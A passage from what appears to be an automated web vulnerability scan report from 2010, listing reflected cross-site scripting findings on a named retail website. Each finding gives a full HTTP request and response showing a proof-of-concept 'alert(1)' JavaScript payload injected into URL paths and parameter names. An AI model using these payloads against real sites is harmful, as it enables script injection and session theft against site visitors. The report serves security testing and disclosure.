The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87dec"-alert(1)-"ff296b429aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/?87dec"-alert(1)-"ff296b429aa=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hct66ard6uj5ogudkb7unb1on2; expires=Tue, 09-Nov-2010 17:04:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Accesso
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/?87dec"-alert(1)-"ff296b429aa=1");
//]]>
...[SNIP]...

1.12. http://www.fredperry.com/accessories/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaeba"-alert(1)-"564e77c9441 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessorieseaeba"-alert(1)-"564e77c9441/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=773q5gsdpnv68cnfegbhjdu6s6; expires=Tue, 09-Nov-2010 17:04:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessorieseaeba"-alert(1)-"564e77c9441/men/");
//]]>
...[SNIP]...

1.13. http://www.fredperry.com/accessories/men/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0c1"-alert(1)-"54c23c18eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/menca0c1"-alert(1)-"54c23c18eea/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=q7rt87m86laigg4gl21ne3jr05; expires=Tue, 09-Nov-2010 17:05:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/menca0c1"-alert(1)-"54c23c18eea/");
//]]>
...[SNIP]...

1.14. http://www.fredperry.com/accessories/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 590b7"-alert(1)-"544c5a1307c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/men/?590b7"-alert(1)-"544c5a1307c=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8a661dttofbjdqts80oc7tuh30; expires=Tue, 09-Nov-2010 17:03:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's A
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/men/?590b7"-alert(1)-"544c5a1307c=1");
//]]>
...[SNIP]...

1.15. http://www.fredperry.com/accessories/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11fe7"-alert(1)-"0b8ff4d883b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories11fe7"-alert(1)-"0b8ff4d883b/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=41433rkoa4tsrfs0gjisr0kgh3; expires=Tue, 09-Nov-2010 17:04:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories11fe7"-alert(1)-"0b8ff4d883b/women/");
//]]>
...[SNIP]...

1.16. http://www.fredperry.com/accessories/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ebf0"-alert(1)-"bda42614438 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/women5ebf0"-alert(1)-"bda42614438/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rl1ftnqr0ih5pd8j1k1v00h7j4; expires=Tue, 09-Nov-2010 17:04:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/women5ebf0"-alert(1)-"bda42614438/");
//]]>
...[SNIP]...

1.17. http://www.fredperry.com/accessories/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c39ae"-alert(1)-"affbc874198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessories/women/?c39ae"-alert(1)-"affbc874198=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=msht6dmdh4f7qkdrokbg4p7sa4; expires=Tue, 09-Nov-2010 17:03:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessories/women/?c39ae"-alert(1)-"affbc874198=1");
//]]>
...[SNIP]...

1.18. http://www.fredperry.com/arcade/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /arcade/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b4aa"-alert(1)-"eed14cdfb13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /arcade9b4aa"-alert(1)-"eed14cdfb13/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=enh4qopt52d480f45ghi1eifu3; expires=Tue, 09-Nov-2010 17:18:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/arcade9b4aa"-alert(1)-"eed14cdfb13/");
//]]>
...[SNIP]...

1.19. http://www.fredperry.com/arcade/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /arcade/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a634a"-alert(1)-"292ae239ba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /arcade/?a634a"-alert(1)-"292ae239ba4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l6hegaha8strl6ujrbvmu5cg23; expires=Tue, 09-Nov-2010 17:18:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Arcade
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/arcade/?a634a"-alert(1)-"292ae239ba4=1");
//]]>
...[SNIP]...

1.20. http://www.fredperry.com/bags/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e542"-alert(1)-"ab556611c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags1e542"-alert(1)-"ab556611c86/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6et872hljcv57tm45lk8ssvqp2; expires=Tue, 09-Nov-2010 17:21:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags1e542"-alert(1)-"ab556611c86/");
//]]>
...[SNIP]...

1.21. http://www.fredperry.com/bags/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 672ee"-alert(1)-"71633396054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/?672ee"-alert(1)-"71633396054=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vprn28dhlohctf81ipm71lhos2; expires=Tue, 09-Nov-2010 17:21:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Bags -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/?672ee"-alert(1)-"71633396054=1");
//]]>
...[SNIP]...

1.22. http://www.fredperry.com/bags/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11130"-alert(1)-"1f093ec014e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags11130"-alert(1)-"1f093ec014e/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eu32c8hn6p6l6pl7shl718a3s1; expires=Tue, 09-Nov-2010 17:21:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags11130"-alert(1)-"1f093ec014e/men/");
//]]>
...[SNIP]...

1.23. http://www.fredperry.com/bags/men/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 700bd"-alert(1)-"638b67561b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/men700bd"-alert(1)-"638b67561b1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2dpnq9s6uhordu2ekaag73oqd1; expires=Tue, 09-Nov-2010 17:22:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/men700bd"-alert(1)-"638b67561b1/");
//]]>
...[SNIP]...

1.24. http://www.fredperry.com/bags/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc8a"-alert(1)-"a9caf531ee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/men/?9dc8a"-alert(1)-"a9caf531ee8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=987e9hdtksal28qktsq7m48l10; expires=Tue, 09-Nov-2010 17:20:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
